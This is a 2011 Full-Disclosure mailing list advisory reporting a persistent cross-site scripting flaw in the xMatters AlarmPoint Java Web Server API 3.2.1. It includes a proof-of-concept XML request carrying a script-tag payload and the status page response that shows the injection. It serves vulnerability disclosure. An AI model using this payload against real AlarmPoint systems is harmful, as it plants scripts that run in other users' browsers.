[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Insect Pro - Advisory 2011 0427 Persistent Cross-Site Scripting (XSS) in xMatters AlarmPoint



 Information
 --------------------
 Name : XSS Persistent vulnerability in xMatters AlarmPoint Java Web 
 Server API
 Software : xMatters AlarmPoint
 Vendor Homepage : http://www.xmatters.com
 Vulnerability Type : Cross-Site Scripting
 Severity : High
 Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>

 Description
 ------------------
 The AlarmPoint Java Server consists of a collection of software  
 components and software APIs designed to provide a flexible and
 powerful set of tools for integrating various applications to 
 AlarmPoint.

 Details
 -------------------
 AlarmPoint Java Web Server API is affected by a Persistent XSS 
 vulnerability in version 3.2.1

 Exploit as follow:
 Insert new HTTP API with the following malicious code:
 <?xml version="1.0"?>
 <transaction version="1.0">
    <header>
        <method>Alive</method>
    </header>
    <data>
        <agent_client_id>ping</agent_client_id>
    </data>
 </transaction>'><script>alert(/XSS/)</script>

 Go to: http://example.com:2010/agent/status.html
 Reponse:
 AgentStatus
 3.2.1 (Build 
 
23894/20071210175331)ea-cad0f2c429ee/192.168.72.128Unavailable192.168.72.128:2004115'><script>alert(/XSS/)</script>

 Cross-Site Scripting attacks are a type of injection problem, in which 
 malicious scripts are injected into the otherwise benign and trusted web 
 sites.
 https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

 Solution
 -------------------
 No patch are available at this time.

 Credits
 -------------------
 Manual discovered by Insecurity Research Labs
 Juan Sacco - http://www.insecurityresearch.com

-- 
 --
  _________________________________________________
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released stay tunned

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/